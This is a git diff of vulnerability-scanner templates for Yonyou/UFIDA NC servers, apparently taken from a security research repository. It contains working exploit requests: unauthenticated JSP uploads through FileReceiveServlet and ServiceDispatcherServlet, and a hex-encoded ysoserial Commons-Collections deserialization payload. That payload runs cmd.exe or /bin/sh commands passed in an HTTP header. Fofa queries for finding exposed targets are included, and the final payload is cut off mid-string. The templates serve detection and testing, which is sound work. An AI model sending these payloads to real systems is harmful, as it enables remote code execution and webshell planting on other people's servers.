https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json + metadata: + max-request: 1 + fofa-query: app="Yonyou-UFIDA-NC" + verified: true + tags: yonyou,nc,fileupload,baseapp,deserialization http: - - raw: - - | - GET /service/~baseapp/UploadServlet HTTP/1.1 - Host: {{Hostname}} - + - method: GET + path: + - "{{BaseURL}}/service/~baseapp/UploadServlet" matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(body_1,"java.io")' - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml similarity index 73% rename from http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml index d814725950..e0948aa60f 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml @@ -1,33 +1,36 @@ -id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload +id: yonyou-nc-dispatcher-fileupload info: - name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload + name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload author: SleepingBag945 severity: critical - description: Yonyou-NC FileReceiveServlet Arbitrary File Upload - tags: yonyou,nc + description: | + Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability. + reference: + - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md + metadata: + fofa-query: icon_hash="1085941792" + verified: true + tags: yonyou,nc,intrusive http: - raw: - | POST /ServiceDispatcherServlet HTTP/1.1 - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) Content-Type: application/data Host: {{Hostname}} Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}} - - | GET /ncupload/n2d19a.jsp HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'just_a_test')" - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml deleted file mode 100755 index 9ed15f65c3..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: yonyou-nc-filereceiveservlet-arbitrary-file-upload - -info: - name: Yonyou NC FileReceiveServlet Aribitrary File Upload - author: bjxsec - severity: high - tags: yonyou,oa,bjxsec,yonyouoa - description: fofa app="用友-UFIDA-NC" "/platform/yonyou-yyy.js" -variables: - file_name: "{{to_lower(rand_text_alpha(8))}}.jsp" - file_content: "{{to_lower(rand_text_alpha(26))}}" -http: - - raw: - - | - POST /servlet/FileReceiveServlet HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - Content-Type: multipart/form-data; - Referer: https://google.com - - {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} - - | - GET /t00ls.jsp HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "contains(body_2, '{{file_content}}')" - - "status_code_1 == 200 && status_code_2 == 200" - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml new file mode 100755 index 0000000000..2ffe88dd33 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml @@ -0,0 +1,41 @@ +id: yonyou-nc-filereceiveservlet-fileupload + +info: + name: Yonyou NC FileReceiveServlet - Aribitrary File Upload + author: bjxsec + severity: critical + description: | + An unauthorized attacker can upload a file via the FileReceiveServlet endpoint. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml + metadata: + max-request: 1 + fofa-query: app="用友-UFIDA-NC" + verified: true + tags: yonyou,nc,fileupload,intrusive + +variables: + file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" + file_content: "{{randstr}}" + +http: + - raw: + - | + POST /servlet/FileReceiveServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; + + {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} + + - | + GET /{{file_name}} HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{file_content}}')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml similarity index 66% rename from http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index 14892e8603..192ab5ea24 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -1,13 +1,19 @@ -id: yonyou-nc-grouptemplet-file-upload +id: yonyou-nc-grouptemplet-fileupload info: - name: yonyou-nc-grouptemplet-file-upload + name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload author: SleepingBag945 severity: critical - description: 用友NC任意文件上传 + description: | + The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files. reference: - https://www.seebug.org/vuldb/ssvid-99547 - tags: yonyou + - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py + metadata: + max-request: 2 + fofa-query: app="用友-UFIDA-NC + verified: true + tags: yonyou,nc,intrusive variables: v1: "{{rand_int(1,100)}}" @@ -29,7 +35,7 @@ http: - | GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: dsl diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml index 1e9f7f67a8..4ad07a32fd 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml @@ -1,22 +1,28 @@ id: yonyou-nc-ncmessageservlet-rce info: - name: 用友NC NCMessageServlet反序列化漏洞 + name: UFIDA NC NCMessageServlet - Deserialization RCE Detect author: SleepingBag945 severity: critical - description: 用友NC在处理客户端请求数据的过程中。在反序列化用户提供的数据时,没有足够的检查和过滤,可能导致恶意的反序列化操作,在操作系统上执行命令。安全研究员经过分析后,发现该系统存在反序列化的利用点较多。目前在官方公开漏洞修复方案为对已知利用点进行反序列化白名单控制,以及对部分利用链依赖进行修复。导致该系统后续出现类似问题的可能性依旧较大。 - tags: yonyou,rce + description: | + UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml + metadata: + max-request: 2 + fofa-query: app="用友-UFIDA-NC + verified: true + tags: yonyou,rce,deserialization,nc http: - raw: - | POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: multipart/form-data; X-T0KEN-INF0: set /A 987843129+808922377 Accept-Encoding: gzip, deflate - + {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} - | @@ -26,19 +32,13 @@ http: Content-Type: multipart/form-data; X-T0KEN-INF0: expr 987843129+808922376 Accept-Encoding: gzip, deflate - + {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA0700320700380107001607004007000300000